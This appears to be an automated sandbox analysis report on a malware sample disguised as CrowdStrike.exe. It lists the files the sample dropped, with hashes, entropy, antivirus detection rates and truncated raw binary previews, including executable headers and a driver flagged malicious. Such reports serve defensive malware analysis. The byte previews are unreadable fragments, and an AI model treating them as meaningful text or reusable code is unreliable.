                                                                      Preview: >$>(>,>0>4>8><>@>D>H>P>T>X>\>`>d>h>l>p>t>x>|>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.?...`.......4.4.4.4.4.4.4.4.5.5.5.5.5.5.5.5 5$5(5,5054585<5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5|5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.6.6.6.6.6.6.6.6 6$6(6,6064686<6@6D6H6L6P6T6X6\6`6.7.7...p..0....>.?.?.?,?0?@?D?H?P?h?x?|?.?.?.?.?.?.?......8....0.0.0.0 0$0(0,0004080<0@0D0H0L0P0T0X0`0d0h0x0......4....6.6.6.6 6$6p8t8x8|8.8.8.8.8.8.8.8.8.8.8.8.8....(....7.7.7.7.7.7.7.7.7.7.7.7.8.8.8.8.8.8.8.8 8$8(8,8084888<8@8D8H8L8P8T8X8\8`8d8h8l8p8t8x8|8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.9.9.9.9.9.9.9.9.9.:.:.:.:.:.:.:.: :$:(:H:L:P:T:X:\:`: =$=(=,=0=4=8=<=@=D=H=L=P=T=X=\=`=d=h=l=p=t=x=|=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=........\0`0.8.8.8.8.8.8.8.:.;.;.;.;,;4;H;h;.;.;.;.;.;.<(<H<h<t<.<.<.<.<.=,=0=L=P=p=.=.=.=.=.=.> >@>\>`>|>.>.>.>.>.>.>.?(?H?h?.?.?.?.?...........0(0H0h0.0.0.0......,....0.0.8.9.9.9.9.9.9.9.9.9.9.9.9.:.:.:.:.:.:.:.: :$:(:,:0:4:

                                                                      C:\Users\user\AppData\Local\Temp\Job

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:DOS executable (COM)
                                                                      Category:dropped
                                                                      Size (bytes):53248
                                                                      Entropy (8bit):6.138590026121251
                                                                      Encrypted:false
                                                                      SSDEEP:1536:w4ztrgWVrZ+In23SwFc1vtmgMbFuPO1MBNfMBNx:3ZaUAg0FuPOKBNEBNx
                                                                      MD5:872A95B540C0E493D57D0D30A6DA3F43
                                                                      SHA1:32080524D58B810FEA453C83FC4A927B802CADD7
                                                                      SHA-256:44135E9284EF8EEFDC9076514D9C79699A7326AE2ACF95D03FA19CEA2057E10A
                                                                      SHA-512:48827A9C6145FE7E4E35493F4EE9F3D9A1A3EC233E7F46825F59AE5E093E83C615F8F424A3F05D951760B0D9983AB98643317AA79CD2F579CCF6E34AAC430565
                                                                      Malicious:false
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                                      Preview:...N.;.r.j..u....u...........t..6..u.3.@_^[].3...SV... ..W.N<.<.;.~...;.}[..+...d|R..?P...gJ...Y..u.j..?.F<..P.v.S.n'...F ...+F....~<......C.F ~..v....gJ.Y.^.3..~<..jHX_^[...K.....B..u.8.t.I.........K..U....SV....U.W.]..q.3.......=...............H..$.{.H..u.3.......u.f;.U..u......F...............jw..[..F..4Ff9.t.]......y...]...;...{...jwXf;...k.......r....}....b....E...N.jw[.@...H....A...Af9.t.].;.v.;...0....M.....t.9P.t.....u..........E..M.P.u..U.J..u..U....................T...jw[..F..4Ff9.t.....].... gJ..4F.......F.... gJ...4N....... gJ...G....}........f.F......f#......f;................F..........F.....F....t....uD....?...G...pu...F..4F....".....b|(..g~-..i~...l~#..mu...F.f;F.u...........G..............j...j...j.X_^[..].I...H...H...H.j.H...H.a.H...H...H...H...H...H.z.H...H...H.n.H...................................................................................................................................................................U..QSV..W...3;........E..

                                                                      C:\Users\user\AppData\Local\Temp\Jul

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):168960
                                                                      Entropy (8bit):7.998890071589778
                                                                      Encrypted:true
                                                                      SSDEEP:3072:oXAGdsQKupzym7OvekyN4gwDLZDzbU6yYujd9VwtYg9z6w1o3FkHtqILVcBBGJmT:o5aQKu1yoGeBGLZD3U6yYQWYg9z6wykc
                                                                      MD5:03F165D90E5230AE30F39D1C9EB7A770
                                                                      SHA1:4D30829547839A5C31250FC389B07EDE3124A883
                                                                      SHA-256:528C3017CE896BD42CAD6AA9199F0A14B0673A27618A6D3CD4C16DDE4DA903BE
                                                                      SHA-512:C4C8076AAD717AEAC1F799B0891E7D2C741886F54B3F28CF3E13F11863258B53EBC2DA91E25E3A386BBFD919906911F3D2FE7F79ACAECB98EF7947950A577A7A
                                                                      Malicious:false
                                                                      Preview:..+...TV...\..2].?D......$y...1#...{....X......1......k..u....).R..*.>...8....?;E..#...H.D&%....[..c.kO.&.|.."KZDk..v...4...w..h...$TI$~.kJ.>S..I)~.*........f....6..f6.a......g.RdS.k@..:o.4.9....e).].v....Gs..@......$..3...;.!\=.Q.H'....7.........Pg....WS..5...f.&.R.B].Y_.+.k.....C]........U#...]...ub.'.."..%_.J`5Ue.U..... ......1.,....k:..`D...y.....luI.V61:...{.8.,PDBn....4jl<K.}.i.F... .'./.....qUA.#?.J. ....8%.2..).8........z].lM...S......5Z.....?.;1..^...]...$E.....c./@.T....".{...EMUc.........&#6.d.6~t.B......D ..{.t.l.-..-...u...f.7..O.RE.p...<.$j.}p.u.h.X....?.JNM.../:...b..U..o........bQ...Q<...........J.2..+..F2.{...(N.b...g.Z.N}u...+P...}.%.g'.NU/d4..9e./...:T.V.1..d>..."c.~...k......@...Z...H.D--..n.,......u~.i=..mk.Z.Z......H.4.....`a......%..(.{.>......Z....f.=...a.].hun(..;......zb.k...-.^...W..~D...>....f...x2p9X.,_.%....P.......9..%zX`.....Z..N8V.QRV..m.KO...t...V...h...8.J....p......!..'.G._.t>........[.}bG;.

                                                                      C:\Users\user\AppData\Local\Temp\Lasting

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):65536
                                                                      Entropy (8bit):6.483058023596733
                                                                      Encrypted:false
                                                                      SSDEEP:1536:D6CV21YEsmnq7Cv/+/Coc5m+4Xf8O46895LmNg:GCV26MqgQTc5F446iYNg
                                                                      MD5:044E398EC410457FFD2F42DBC3EF5D70
                                                                      SHA1:F45E57234014749B0D3C0A0F46E0694F6BEA01ED
                                                                      SHA-256:01F2D93D90F2F593356B9328A1225469D42186A5B664E3A05BC4E5236E9CD03F
                                                                      SHA-512:A74DE980BAC35C2B2C7332945821A946F69FC6892155F17ABE8DB41C4EE982AD88F2309607E6888DAE72CF279DB4B32DB64258CF15B605ABDB703157FC20C92B
                                                                      Malicious:false
                                                                      Preview:*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B.........................................................................................................................................................................................................................................................................................................DaL.....h..C..\...Y...L..h..C..K...Y..N..h..C..:...Y.h..C......Y..<C..h..C......Y.....h..C......Y.Q.>...h..C..

                                                                      C:\Users\user\AppData\Local\Temp\ListOpenedFileDrv_32.sys

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
                                                                      File Type:PE32 executable (native) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):3968
                                                                      Entropy (8bit):4.961101807608474
                                                                      Encrypted:false
                                                                      SSDEEP:48:QMmPrxEkBbiCzjPAkrc6dU4z13Be5P2dbH7xHToqBRAZ4w:IFEkICnPA8cAiEromy
                                                                      MD5:DA663D3EA0C818A60292E5239EF23DAE
                                                                      SHA1:72F43721AD2B5A0C84360E171361E5DFA606E86F
                                                                      SHA-256:9E519211947C63D9BF6F4A51BC161F5B9ACE596C2935A8EEDFCE4057F747B961
                                                                      SHA-512:2EF7535C2A9D860EBE0EEEE34949E330F765ECD10FCDCF74D2C5B7F6EBBDF64A2E25ECB420B4044E6F4C07DE692F8BACCE626067CBE145B3EED713AA1EDB2F13
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      • Antivirus: Virustotal, Detection: 3%, Browse
                                                                      Preview:MZ......................@...................................P...........!..L.!This program cannot be run in DOS mode....$........................................................................................................................................................................................................................................................................................................................................................................................................4.M.U...U...U.......U...U...U..fZ...U..fZ...U.......U.......U..Rich.U..........PE..L...0>{L............................................................................@.......................................D...(...............................d...@...............................`...@...............@............................text...l........................... ..h.rdata..D...........................@..H.data...............................@...INIT................................ ...

                                                                      C:\Users\user\AppData\Local\Temp\Moreover

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):8192
                                                                      Entropy (8bit):6.525398386998519
                                                                      Encrypted:false
                                                                      SSDEEP:192:jIhwLZXBlHoLGqoozNnmd+/YLlLGcopEII6XBfoLgn:0CvEGqooAdQGcA6XBwMn
                                                                      MD5:F335E743D9A5D72A068210A9C9F605E3
                                                                      SHA1:5BA897EC85ABEADED76708A92A716EA44FD199E1
                                                                      SHA-256:E5DC3C6C185C46FB75C682327750A542D0A84F7C17CAA39469755EADEEF37BA7
                                                                      SHA-512:5B245023C0881C9BD0EA7BACFC293C4C25FF876754FCBE32BB271FB561CB2D9876ECE709106C7A0F6267EB9BFA0ACCD8A6E01BCB824E1ADE80D1407BB692A860
                                                                      Malicious:false
                                                                      Preview:.........O(....0....G .P..G,......;X..].]...\....U.........G .0.E.+........O.;............,.....;........M........O....F.9E...|......M..u...V..HP.u..J....E....3.f..0.E...;...H...j.j.P.7...3..E...........E...................Q.t.......E.3.f..j..b......................M.3..]..u..u............E.3.u.f...M..A...........$......;...M.....qf.:\......;...@.....qf.:$..\.....F.u.;...-.....Q.M.....E.......j....E...9E........].E.M.f..C.M.E.A3.M.f..H.M..A.;...u....].3..E...........E...................Q._.......E.3.f..j..M........M................U..M..R.;.........+.E...-....E...u.P........u..w.......u..u........u..u..\......S.S.......u..E.].;...(....u.u..tC.K........7....C.@..9C...|....K...6P...u..HP......s.....K.3..f..H.U...M..U......j.j..M..........P......E..E...t.P........E.3..............Q.)......3.f..p.E..A......u...,...W....G..M.+.PVW.u....E...P......M......M......E._^[..]....E...+......3..p.....A......A......A.....3.M..f......p...3..U....SV..W3.9~.tY.~..tS.M....

                                                                      C:\Users\user\AppData\Local\Temp\Number

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):49152
                                                                      Entropy (8bit):6.677466195008743
                                                                      Encrypted:false
                                                                      SSDEEP:768:9w4sWGuv6crjQAVlvZEx2zinQD2tR/i01A/ES4KY2lfwMwstd7t+Jv/awuUd:fo/RIs2ziQD2tR/i0027EM/awuUd
                                                                      MD5:C187E58A09247BD0E6D373E8E7432C12
                                                                      SHA1:AED07C0015989F623AE42AA206351551AB053B46
                                                                      SHA-256:AD9A2BD7C9CCC68820DDCBEB670F097FDD4C6BE734C46CB4236970846F293645
                                                                      SHA-512:C3B383799F5326F0977D4A47792622621C6F24D34EA18258D32DE893F859FB291F43E252B8775F6B426F6DA7D03D4ED9A014AF7ABAEDD101272D235257EC99EA
                                                                      Malicious:false
                                                                      Preview:.@.L....Z...........=.aL.............\$..D$.%....=....u..<$f..$f...f....d$.uU.......=.aL..t2.....\$..D$.%....=....u..<$f..$f...f....d$.u..........$.............T$....R..<$tmf.<$..t..I...=...?s+..............=.YL...............P.L....w:.D$...%.....D$.u).........-..I.t................u.|$..u....-..I.......=.YL....J..........P.L..S...Z...........=.aL.............\$..D$.%....=....u..<$f..$f...f....d$.uU.......=.aL..t2.....\$..D$.%....=....u..<$f..$f...f....d$.u..........$............T$..=...R..<$tTf.<$..t..-8.I......z...=.YL....j.... .....`.L..g....-:.I.........z....................u.|$..u....-..I.......=.YL......... .....`.L......Z....=.aL.............\$..D$.%....=....u..<$f..$f...f....d$.uU.9.....=.aL..t2.....\$..D$.%....=....u..<$f..$f...f....d$.u...........$.b............T$......R..<$tPf.<$..t..-8.I.......z..=.YL....<..........p.L..9....-:.I.........z.................u.|$..u....-..I.......=.YL..............p.L.....Z........=.aL.............\$..D$.%....=...

                                                                      C:\Users\user\AppData\Local\Temp\Often

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):69632
                                                                      Entropy (8bit):6.809511599866774
                                                                      Encrypted:false
                                                                      SSDEEP:768:acDP8WBosd0bHazf0Tye4Ur2+9BSCVoyO15DuOKHnrxbxZiUCu2iPaLTQ7Q1tCw5:QWyu0uZo2+9BBVgCOa1ZBPaPQaEwos
                                                                      MD5:8C1308689913B76D47B2FEA6C94378C6
                                                                      SHA1:E0202520E3A20062037C4F8AE5A5F17D6C4E803B
                                                                      SHA-256:E0055A2B04595818CDC4B3C5EDB54539E5C3EDF69E134914E6BAD45AB56D0A04
                                                                      SHA-512:0F8EF3408371A94E16833884E14C219E68330DC62468EEB37D50169EDAF3516F9871A79A4753BBB8560C969410B0B0B9C5F3D8BC9FE4878EB056BB84C07AAA71
                                                                      Malicious:false
                                                                      Preview:........................................."". ...#352..."5634"..#c3Sb2..S#S22S..3.!..3!.3"#2.C!.51.!#$!.Cb!!3b!.35".53..#C23c2.."453S1...#3C2.....""...........................................................................(...0...`...................................................................p...`...].................b...b.......^..........e...d..........^.....................e.................l...................v.......^..............v..........................a..........i...........................w......o..........._..........n..._..............m...............s...t...........v..................................}...................f......r.......}..........`.............q.................i...h...........................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\OpenFileFinder.dll

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):860160
                                                                      Entropy (8bit):5.0967320883703415
                                                                      Encrypted:false
                                                                      SSDEEP:6144:rPAfPpmqCjbiNhfN7qWTfTGzlXgzj/kRm7lKZy7Pu4WQLvlMatE1:uCnw6WTqzlQ3hlJGv1atE1
                                                                      MD5:3663BCE9A86D8A619DCB64DC6FFBADEE
                                                                      SHA1:62EB14A3A649F13DD73B856029C4489CC814A1BE
                                                                      SHA-256:8316065C4536384611CBE7B6BA6A5F12F10DB09949E66CB608C92AE8B69E4D67
                                                                      SHA-512:B2B833CD93A3A7ABF78336726F043CE8AE8DEBE67314ED37B580C666A4101FEA86FB7D94C9ED624DC05DE09D2D47678EAE90C12B234632A21E327854E120E108
                                                                      Malicious:false
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...cy..cy..cy...v.dy..D...ty...v.ty..cy..@{..D...y..D...y..D...by..D...by..D...by..Richcy..................PE..L.....L...........!................M........ ...............................`.......'...............................................P...........................4...&...............................z..@............ ...... ...@....................text............................... ..`.rdata..~.... ....... ..............@..@.data....a.......0..................@....rsrc........P......................@..@.reloc..\x..........................@..B........................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\Recipes

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):37888
                                                                      Entropy (8bit):6.597842547264202
                                                                      Encrypted:false
                                                                      SSDEEP:768:xywqp9sK1xhNGE0psu0nM8+aZKINulI1+lRg:EMK1zN90psu0nMOKzlvlK
                                                                      MD5:D0808D4907E66F73A821AB6E7FC942C1
                                                                      SHA1:3A9712C755A6D07CD160730E997BF5CCD4277F42
                                                                      SHA-256:221EEE5A84FDE75849816CDBB84F723E5C96A3E81922692DB21E7844B8537A04
                                                                      SHA-512:1FC978F3172CA04011091D0053CA89A8D872FDCABB3B934B31D6820A8F166ABD0517F2FC854931C76E2E45C40BCF4900F58BD20D57697C1140A03C5E098D3308
                                                                      Malicious:false
                                                                      Preview:.!]......_.....0.K...F......K...~(..U..]...U...(.E..M...e.........M.S.E.3..........].V.r.Wf;.t....f;.t......f;.t.....I...C.]......>.........."........A..$.L.A.C....]..}..t.f.F......f#......f;.u..E..yU..E.jwYf;.tQ_^[..]..p..+F....".........vCC.]..... gJ.jw[.4F..F..4Ff9.t.].....^...;.}..'E..3...!]..]..E......\.A..$.P.A..u..M...u..u.............s.....jw.].[..F..4Ff9.u.....F.j.Zf;.t.j.Zf;.t.... gJ..4F.....jw[.D..........%...j..G....T.A...E...A...A.y.E...A./.A...E.1.E...A...E...E.?.E.o.A...E...E.=.E...A...A...E...A...E.;.A.C.A.......................................................................................................................................................................A...A.h.E.............U..QSVW.}...U....3.... gJ...C..........=..........=..........=..........=..........=......RF..=......GF..=......<F..=......1F....}tR=....tK=....t:=....t3..U...E....V...E....^...E.....t%...t ...t.3._^[..].E.@P..E...u...E....C...Cf.;w......3.@..U........G...M...M..

                                                                      C:\Users\user\AppData\Local\Temp\Relative

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):43008
                                                                      Entropy (8bit):6.659508652100811
                                                                      Encrypted:false
                                                                      SSDEEP:768:rSRWG7iksc7nj6evkuKa5GCJ5YxtXazSTvHZ9ijrUTSu7YeQ0pP:rWWGlHHvpKa5Gk6/vij4Nn
                                                                      MD5:30A726E5E8BE06D5588E9E38E5397666
                                                                      SHA1:D50E8F4502CBE6AD01BC6A4A3A276A4DE7687F4F
                                                                      SHA-256:5B40C05D64F0A1E5A32CA865B3CE9BF6F3747239A56A17EFF1F91DE491D0ED4C
                                                                      SHA-512:09C61BDBB7FF21F9D66D51A729C241998D35DBCD7A7E6EF46C684E78B751B06F0C5F369127CE84FDEF6D3BA1DCA71BAA7211827803A6B72490E6AA7D65253BEC
                                                                      Malicious:false
                                                                      Preview:.......A.<.v...0.9] t".B..E......+t.HH..q....M..j.X.z...j.XJ.....m....H3...@.E.....9.3k....u.......P.......B.M...0}....M..Q.......9....B..0}.J.E..M....M............v..E.<.|....E..M.Oj.AX.M....M.........O8.u.HAO8.t..M..M.QP.E.P.q....M......y....u..E...u..u..E...u.+u...P.....J.........../....@.L...`........y....L....`9].......3.f.E.........T....U..u..........k.........M.f9.r...}..M..M.....M...y..U..3.].%.....].E......#.].#..]...........u.f;...I...f;...@........f;...2.....?..f;.w..]..7...f..u$F.E......u.u..}..u..}..u.3.f.E......f..u.F.A......u.u.9Y.u.9.t.j...U._.E..}..}...~X.u.4F.A..E.....E..E..M..].......M..J.;J.r.;M.s.3.@...E..J...t.f...m.....O.....M..}..E....@O.E..}......u..U.......}.U.f..~;..x2.E.................U..E........}......U..U.f....f...i.......f..y].].........E....E..t.C.M......M..m..E..E...........M..U.E.}.u.j...U.[t.f..3.Gf..f.E.}...f.E.....f;.w.............u@.E...u4.E.]...u f.E......].f;.u.f.U.F..f@f.E...@.E.M...@.E.M..U......f;.r.3..].f9E.

                                                                      C:\Users\user\AppData\Local\Temp\Ripe

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):29696
                                                                      Entropy (8bit):6.466915732622778
                                                                      Encrypted:false
                                                                      SSDEEP:768:gpZP40VLhDPCp5eqMw0jR6s6bvx875rLjDsOc/WYs:g/Pp5q/qw0j8sgy5
                                                                      MD5:9EC558FAB0F745994DA7126E5D9E778B
                                                                      SHA1:24DFB7029412EA93A7D91927D4918933B2C8CDB2
                                                                      SHA-256:24001792498C0D036909D29887678E7F123276BEC12AA7B11A1B3B082D4A2B8B
                                                                      SHA-512:A2263A30A17CE26358B5B8F245D1C252FBB149D9FD2CDDCB41DAB3C3ABD8822F06F86151F6973D1101E54A96FC377601FB9B0DBF982E1CAA1E9AD02DEFFF26F9
                                                                      Malicious:false
                                                                      Preview:.o........O...$....P.l...G...B~........;.r..]~...A..x8.~.........~...w..N.......~...N.......@...$.....~...N........ ..$....P.,....~...N..y8..t.Q.D....~..F...~...F..x8..~....$.............$.....O..C..........u..t$h..jp..o.....E.....|$<....\$ .+.........hL,I.P.%...YY...j.h.......rL....n.........0........t..@...j.@P.7:...D$XP.L$<.=...D$8.t......L.P...p..L$..\.......L.....5..L.....3.!5..L........L$...t$.......|$........t.98t.A;.r.|$<.L$.;.tK...............P..............D$.........Q..L.........F...j.j.@P.A6...w.........D....=.rL....D...j...|.I..X...................D$...P..p...R.....wL...$.....0V._/....wL..u%....t.Q...Q%....$....... .L.............$......P.C..............L$p.D$p.....D$x.....D$|.....b.....$......$L...h.>J..$.........D$t....j..D$t.p.L.P..$T...P.......$L.........L$p.......$......$....h.>J..$.........D$t.\...j..D$t.p.L.P..$$...P......$.........L$p......$......$,...h.>J..$.........D$t.....j..D$t.p.L.P..$4...P.[.....$,....b....X......F.j.j.@P.m4...L$p.X

                                                                      C:\Users\user\AppData\Local\Temp\Sept

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):52224
                                                                      Entropy (8bit):6.6823321284757435
                                                                      Encrypted:false
                                                                      SSDEEP:1536:TpQ4VMEPmfP/b/psgrO4aK9iwcznrQfy0c4cDTOelOFCOBSljvj5h:FQ6ClAMfA4lelIJBSLh
                                                                      MD5:ED3292F153EC8B60B8F7FFB1CA9F0858
                                                                      SHA1:7B32091DDD2282B4A4AEDF4BF3A47A883AE7DD94
                                                                      SHA-256:1E8C217DF502D035EA3B1AC2212C20C9B9DA4DD6FF81D1C3C41A0AF00D8C0D5D
                                                                      SHA-512:C988F25568B1D1E9CC81AFD0DF780FBF371B6BB5FD4CE5F6E8CF36A35DC5AF06BD5DF11E2FE513141B08F8F9F158DBCF5281B105C0B3E6C59129C7F559C24FB7
                                                                      Malicious:false
                                                                      Preview:...............}.......w....].....r.......]......( ..r...) .....\..B;U.~.......}......9U.......;~|...&...........}.%....=....u.............%...............}.......w.t..A.......\...............n\..B;U.~..`....}......9U...R...;~|...&...........}.%....=....u.............%...............}.......s..FD.......[..B;U.~.......}......9U.......;~|...%..............[...FD.......[.....B.}.;U.~......}..E...............V|.E.;...L%...........s..FD......s[...E....}.;.s.f.......f#......f;..E.u.....}..M.A.M.;.~..5....}......9U...'...;~|...$..............[...FD.......[.....B.}.;U.~.......}..E...............V|.E.;....$...........s..FD.......Z...E....}.;.s.f.......f#......f;..E.u.....}..M.A.M.;.~..z....}......9U...l...;~|..$$.............TZ...FD......GZ.....B.}.;U.~..3......... ...$...D..}..E...............N|;....#...V...t..F.j.PQ...KQ..........Y...,.V....+.;.w f..f;F4u.......Y..f.G.f;F6...Y.........t1.G.;F|r).~..u#.~..u.f..f;F4u..Fh..................U...B.}..U.;U...W....b....F|....}.+.;....#...E....

                                                                      C:\Users\user\AppData\Local\Temp\Str

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:OpenPGP Secret Key
                                                                      Category:dropped
                                                                      Size (bytes):198639
                                                                      Entropy (8bit):7.998978513680246
                                                                      Encrypted:true
                                                                      SSDEEP:6144:vzwfNEj8JSw34Zhh63l2HAIFBZcAtsO+5u6nugnZ8cj:+fSw4hycjNc4AnuKZFj
                                                                      MD5:BDE527A6BC09E0CAB16631682E097EE4
                                                                      SHA1:C35C2EB3F69076C693206293EFC8BBD30D942033
                                                                      SHA-256:C84293BC09732E5CCF75A5FEF59C6D8D6A2642FD8336095D958524BF2D080831
                                                                      SHA-512:89CDA448433D5B8FC54021C056388DDD95DC2733914661D2593ACF8DE354D46575A3DC8086737EDC9DEA2F2D3A4A3224615E3C9E43DA914D73689DD385B00B43
                                                                      Malicious:false
                                                                      Preview:.Z.....j}p.....Q..<W*r.&,X`...:B'`.+.{..]...|.Z.......e..H...Ms.9....*..:7%....w.B..XF....?.3.0..<.eW.,..'..]|......)....^3iP....2.,y......P..h..m......O....k.........6.&...LA....T"....Mi...........&!...A+.......Rc.B.#...g.......0...`...2 a......w...W.S.~..8%.7Y..uI..I..5...L.#Ce~.1./....h...8?X.RD.v.{..)..wP....$P....x...x6..v.`[2K....&F........P...WJq..hRI.......O:.......h..5..?.o....,...0....OC....R....bf._..>..gY..gJ..e<.....7.MC..,n=.A\{X..*@..2."..w.?.uK./.o>./..a.......2.R.w.i.........g....y........y..X...."0:...z.5~I4...*..7.y0....y.!....Xo..X...l...bR.(E..h;.......:Z.d....(3...(.V..S..eh.6.|...vg..w....0b...k.r......H3u.~..2.E.#).M...8..X.d|.D..DxP.>.8`2t.........A..T5G...F.n....l.C_].&..G.Klz....9Y.......d*..BnN......../......&.m....^]..p^C9..m0".Q~2S.AD.O..;...W....".5m=.Jj...._....K.O(.......&N.@K.q1(.X6.R.6..f.S.......fc..$$...e..zu.?,3....?P(k......\...]B.e\.4X[.n.*...I.f...|8.l4n.....07.ii....7is.p.Fd.+.8.E#...

                                                                      C:\Users\user\AppData\Local\Temp\Treating

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):138240
                                                                      Entropy (8bit):7.998680055580348
                                                                      Encrypted:true
                                                                      SSDEEP:3072:jMCBS8lSDcMdduo7dyluWiHY3m1sNpuPB0pt5WGpHYwDNmZTPbmJ:jRo8addvdy0WKY3m2uSpLbHY2cw
                                                                      MD5:EE32DCFDEC206D28E06F8722CF70C003
                                                                      SHA1:6F2B4908FFF156A8CD158CC515BF45AB8F3C17EA
                                                                      SHA-256:471AB5DE9CEFDF6BB286EC34F9271831D7CDD5FA3D40AEBD2DBF5073716834CA
                                                                      SHA-512:17201F37506FEDDA6B8AE32EF2D1A0AE3BE1C3A50507A4B6B7E0E2F5EB1C26D5DBFD0AC9AC10B29BDD004E2B4B759CDD20281C02154E54323C7B1FC8D5338B6B
                                                                      Malicious:false
                                                                      Preview:...b..G..@.`...i..nA.w...\....&....01.c.,..i.3.0^P.!.D.......,.G.....c=...a..8X.p...g..8F.l7..s..}hE...........w.....I+..!pa...jI....Tm...x......@f.....q...;8(.~..'%}@[...B?<.....*.k....9(~?..f...b...k..5...<....[..l.\!..s.B.`. xD*.>....?.@B..$S).[...@Z."e`D...L......[...Y..)..6..]|..Q.!..M..x~a.$....X...G....f.M./8....!..Pco..)(.....jX<.cn.tu..l......:e..:..M/.Y..-Mz..RM03$l9....T u.g..d..(.?...Oe....^S..2.....f#.9r8..a..)7.*...k.N._.".]g;......z....j.|4o)......F.../xPiiLh....(...zZ.+Q.DD_......&Ji.6...HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....G.=.'.F...h.............v....oo.v....oo.kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..|.T..,P..Myn.2..t.W....V.....

                                                                      C:\Users\user\AppData\Local\Temp\Ukraine

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):165
                                                                      Entropy (8bit):4.321507978146012
                                                                      Encrypted:false
                                                                      SSDEEP:3:gA1JnqNCqUqt/vllpfrYZcFTS9gXeF+X32ZpAo3n:HUChqjvVg3F+X32l3
                                                                      MD5:62D8B3A646DBBA93A1849FBBB473B439
                                                                      SHA1:CB7B1793379C86539E60E91DE1D25E1F340A2792
                                                                      SHA-256:2257514DCE367D7DDA399F81559FE3212EAC73F4F6D4CF4C615907D9E80BFFEE
                                                                      SHA-512:0E9F4D97B47B189160560973BF7821CA405DD40CD3A52B1D83F09C68DBD7E6046D2D2E18CD2545DB06FFF461AE851580BF90505878C99900933D6AB6EED3ADED
                                                                      Malicious:false
                                                                      Preview:locatedflatrendsoperating..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.

                                                                      C:\Users\user\AppData\Local\Temp\Viagra

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):97280
                                                                      Entropy (8bit):7.998381010094941
                                                                      Encrypted:true
                                                                      SSDEEP:1536:5hmVSOn98WHcbP8D0poL9Bo0ZOUbhCfVqFoLdQ02hYu9fxDvcnmDbaAoxtLCCcLe:5FOn98HtioZUNCfU6q9hZfNcnoaA5foJ
                                                                      MD5:B6FE42E6BD0D9F4B87B6F73EF06A3D0B
                                                                      SHA1:8C4E998A7875FB493A80211126C89A1638F02856
                                                                      SHA-256:D1FBE283CCD1DB36BC91000CFB3694030DCC026FA1987118994B36C37E970E72
